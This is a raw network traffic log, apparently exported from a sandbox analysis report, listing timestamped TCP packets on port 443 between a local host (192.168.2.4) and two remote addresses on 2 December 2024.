                                                          Dec 2, 2024 17:56:22.208015919 CET4434979013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:22.208086014 CET4434979013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:22.208148956 CET49790443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:22.208415031 CET49790443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:22.208431005 CET4434979013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:22.208441973 CET49790443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:22.208446980 CET4434979013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:22.211344957 CET49812443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:22.211381912 CET4434981213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:22.211469889 CET49812443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:22.211667061 CET49812443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:22.211683035 CET4434981213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.446938992 CET4434980813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.447828054 CET49808443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.447853088 CET4434980813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.448249102 CET49808443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.448255062 CET4434980813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.497899055 CET4434980913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.498671055 CET49809443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.498701096 CET4434980913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.499023914 CET49809443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.499028921 CET4434980913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.525558949 CET4434981013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.525875092 CET49810443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.525892019 CET4434981013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.526202917 CET49810443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.526207924 CET4434981013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.627677917 CET4434981113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.628086090 CET49811443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.628106117 CET4434981113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.628460884 CET49811443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.628467083 CET4434981113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.887090921 CET4434980813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.887161016 CET4434980813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.887216091 CET49808443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.887403011 CET49808443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.887417078 CET4434980813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.887427092 CET49808443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.887432098 CET4434980813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.890233040 CET49813443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.890263081 CET4434981313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.890343904 CET49813443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.890497923 CET49813443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.890508890 CET4434981313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.934834957 CET4434980913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.934895992 CET4434980913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.934950113 CET49809443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.935065031 CET49809443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.935075045 CET4434980913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.935090065 CET49809443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.935094118 CET4434980913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.936948061 CET49814443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.936984062 CET4434981413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.937051058 CET49814443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.937154055 CET49814443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.937166929 CET4434981413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.962363958 CET4434981013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.962425947 CET4434981013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.962477922 CET49810443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.962584972 CET49810443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.962589979 CET4434981013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.962605953 CET49810443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.962610006 CET4434981013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.964663029 CET49815443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.964673996 CET4434981513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.964744091 CET49815443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.964874029 CET49815443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.964884043 CET4434981513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.996315002 CET4434981213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.996646881 CET49812443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.996656895 CET4434981213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:23.997684002 CET49812443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:23.997688055 CET4434981213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.105767012 CET4434981113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.105818987 CET4434981113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.105864048 CET49811443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.105981112 CET49811443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.105987072 CET4434981113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.105994940 CET49811443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.105998039 CET4434981113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.107793093 CET49816443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.107822895 CET4434981613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.107892036 CET49816443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.108021975 CET49816443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.108037949 CET4434981613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.446504116 CET4434981213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.446576118 CET4434981213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.446623087 CET49812443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.446808100 CET49812443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.446825027 CET4434981213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.446844101 CET49812443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.446849108 CET4434981213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.449568033 CET49817443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.449608088 CET4434981713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.449692965 CET49817443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.449846983 CET49817443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:24.449858904 CET4434981713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:24.923670053 CET44349795142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:56:24.923738003 CET44349795142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:56:24.923784971 CET49795443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:56:25.617130041 CET49795443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:56:25.617166042 CET44349795142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:56:25.721293926 CET4434981413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.722332954 CET49814443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:25.722362995 CET4434981413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.723665953 CET49814443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:25.723673105 CET4434981413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.745923042 CET4434981513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.746279001 CET49815443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:25.746298075 CET4434981513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.746589899 CET49815443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:25.746593952 CET4434981513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.746728897 CET4434981313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.746954918 CET49813443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:25.746968985 CET4434981313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.747241974 CET49813443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:25.747246027 CET4434981313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.959678888 CET4434981613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.960186005 CET49816443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:25.960228920 CET4434981613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:25.960629940 CET49816443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:25.960635900 CET4434981613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.165533066 CET4434981413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.165611982 CET4434981413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.165704966 CET49814443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.166029930 CET4434981713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.166193962 CET49814443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.166213036 CET4434981413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.166229963 CET49814443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.166234970 CET4434981413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.166944981 CET49817443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.166976929 CET4434981713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.168497086 CET49817443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.168503046 CET4434981713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.172755957 CET49818443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.172791004 CET4434981813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.172914028 CET49818443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.173326015 CET49818443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.173337936 CET4434981813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.195163965 CET4434981513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.195218086 CET4434981513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.195295095 CET49815443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.195661068 CET49815443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.195676088 CET4434981513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.201081991 CET49819443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.201109886 CET4434981913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.201245070 CET49819443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.201584101 CET49819443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.201598883 CET4434981913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.203963041 CET4434981313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.204015017 CET4434981313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.204102039 CET49813443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.204452991 CET49813443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.204457998 CET4434981313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.204504013 CET49813443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.204509020 CET4434981313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.210243940 CET49820443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.210273027 CET4434982013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.210402966 CET49820443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.210830927 CET49820443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.210841894 CET4434982013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.414556980 CET4434981613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.414633989 CET4434981613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.414696932 CET49816443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.414869070 CET49816443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.414889097 CET4434981613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.414899111 CET49816443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.414904118 CET4434981613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.419393063 CET49821443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.419425964 CET4434982113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.419523954 CET49821443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.419699907 CET49821443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.419708967 CET4434982113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.601463079 CET4434981713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.601522923 CET4434981713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.601577997 CET49817443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.601735115 CET49817443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.601748943 CET4434981713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.601758957 CET49817443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.601763010 CET4434981713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.603995085 CET49822443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.604027033 CET4434982213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:26.604091883 CET49822443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.604217052 CET49822443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:26.604228973 CET4434982213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:27.756598949 CET4434981813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:27.760036945 CET49818443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:27.760054111 CET4434981813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:27.760482073 CET49818443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:27.760487080 CET4434981813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:27.990271091 CET4434981913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:27.990675926 CET49819443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:27.990699053 CET4434981913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:27.991108894 CET49819443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:27.991120100 CET4434981913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.027920961 CET4434982013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.028487921 CET49820443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.028502941 CET4434982013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.028917074 CET49820443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.028922081 CET4434982013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.200685978 CET4434981813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.200748920 CET4434981813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.200810909 CET49818443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.200985909 CET49818443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.201003075 CET4434981813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.201013088 CET49818443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.201020002 CET4434981813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.203788042 CET49823443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.203821898 CET4434982313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.203905106 CET49823443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.204071999 CET49823443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.204087019 CET4434982313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.207410097 CET4434982113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.207726002 CET49821443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.207740068 CET4434982113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.208168983 CET49821443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.208174944 CET4434982113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.320687056 CET4434982213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.321109056 CET49822443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.321120024 CET4434982213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.321533918 CET49822443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.321538925 CET4434982213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.434386015 CET4434981913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.434453964 CET4434981913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.434506893 CET49819443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.434710979 CET49819443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.434727907 CET4434981913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.434739113 CET49819443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.434742928 CET4434981913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.437504053 CET49824443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.437536955 CET4434982413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.437629938 CET49824443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.437809944 CET49824443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.437820911 CET4434982413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.474261045 CET4434982013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.474338055 CET4434982013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.474399090 CET49820443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.474603891 CET49820443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.474622011 CET4434982013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.474633932 CET49820443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.474639893 CET4434982013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.478713989 CET49825443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.478816032 CET4434982513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.478924990 CET49825443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.479100943 CET49825443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.479136944 CET4434982513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.657823086 CET4434982113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.657876968 CET4434982113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.657937050 CET49821443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.658088923 CET49821443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.658102989 CET4434982113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.658132076 CET49821443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.658135891 CET4434982113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.661720991 CET49826443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.661753893 CET4434982613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.661823988 CET49826443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.661937952 CET49826443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.661950111 CET4434982613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.909956932 CET4434982213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.910026073 CET4434982213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.910073042 CET49822443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.910295963 CET49822443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.910314083 CET4434982213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.910325050 CET49822443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.910330057 CET4434982213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.913011074 CET49827443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.913038015 CET4434982713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:28.913108110 CET49827443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.913258076 CET49827443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:28.913269997 CET4434982713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:29.990885019 CET4434982313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:29.991271019 CET49823443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:29.991295099 CET4434982313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:29.991653919 CET49823443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:29.991658926 CET4434982313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.282283068 CET4434982513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.282776117 CET49825443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.282805920 CET4434982513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.283196926 CET49825443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.283202887 CET4434982513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.439166069 CET4434982313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.439224958 CET4434982313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.439285040 CET49823443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.439457893 CET49823443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.439467907 CET4434982313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.439479113 CET49823443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.439483881 CET4434982313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.442018986 CET49828443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.442051888 CET4434982813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.442132950 CET49828443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.442277908 CET49828443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.442291021 CET4434982813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.445960045 CET4434982613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.446284056 CET49826443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.446315050 CET4434982613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.446671963 CET49826443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.446676970 CET4434982613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.752856016 CET4434982513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.752952099 CET4434982513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.753017902 CET49825443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.753218889 CET49825443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.753230095 CET4434982513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.753238916 CET49825443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.753242970 CET4434982513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.756448030 CET49829443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.756477118 CET4434982913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.756552935 CET49829443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.756721020 CET49829443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.756731033 CET4434982913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.759232044 CET4434982713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.759608030 CET49827443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.759623051 CET4434982713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.760035992 CET49827443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.760040998 CET4434982713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.890955925 CET4434982613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.891019106 CET4434982613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.891069889 CET49826443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.891165972 CET49826443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.891180038 CET4434982613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.891192913 CET49826443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.891196966 CET4434982613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.893814087 CET49830443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.893845081 CET4434983013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.893897057 CET49830443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.894087076 CET49830443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.894099951 CET4434983013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.898366928 CET4434982413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.898873091 CET49824443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.898890018 CET4434982413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:30.899761915 CET49824443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:30.899766922 CET4434982413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.233145952 CET4434982713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.233210087 CET4434982713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.233258963 CET49827443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.233453035 CET49827443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.233458996 CET4434982713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.233469963 CET49827443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.233473063 CET4434982713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.236219883 CET49831443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.236242056 CET4434983113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.236331940 CET49831443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.236495972 CET49831443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.236509085 CET4434983113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.344511986 CET4434982413.107.246.63192.168.2.4
